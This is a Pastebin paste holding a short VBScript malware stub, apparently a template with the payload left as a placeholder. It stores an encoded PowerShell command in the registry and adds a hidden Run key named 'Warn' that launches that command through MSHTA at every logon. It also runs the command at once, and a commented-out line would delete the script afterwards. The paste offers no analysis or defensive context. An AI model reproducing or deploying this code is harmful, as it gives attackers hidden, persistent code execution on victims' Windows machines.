Advertisement
Guest User

Untitled

a guest
Sep 19th, 2019
159
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.63 KB | None | 0 0
  1. set Obj0 = CreateObject("Wscript.Shell")
  2. H="powershell.exe -noexit -enc الكود المشفر"
  3. Obj0.regwrite D,H,"REG_EXPAND_SZ"
  4. RR="MSHTA VbScript:Execute(" & chrw(34) & "CreateObject(" & chrw(34) & chrw(34) & "Wscript.Shell" & chrw(34) & chrw(34) & ").Run CreateObject(" & chrw(34) & chrw(34) & "Wscript.Shell" & chrw(34) & chrw(34) & ").RegRead(" & chrw(34) & chrw(34) & D & chrw(34) & chrw(34) & "), 0, False:close" & chrw(34) & ")"
  5. Obj0.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Warn", RR, "REG_EXPAND_SZ"
  6. Obj0.Run RR,0,false
  7. 'Obj0.Run "cmd.exe /c del " & ChrW(34) & Wscript.scriptfullname & ChrW(34),0,false
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement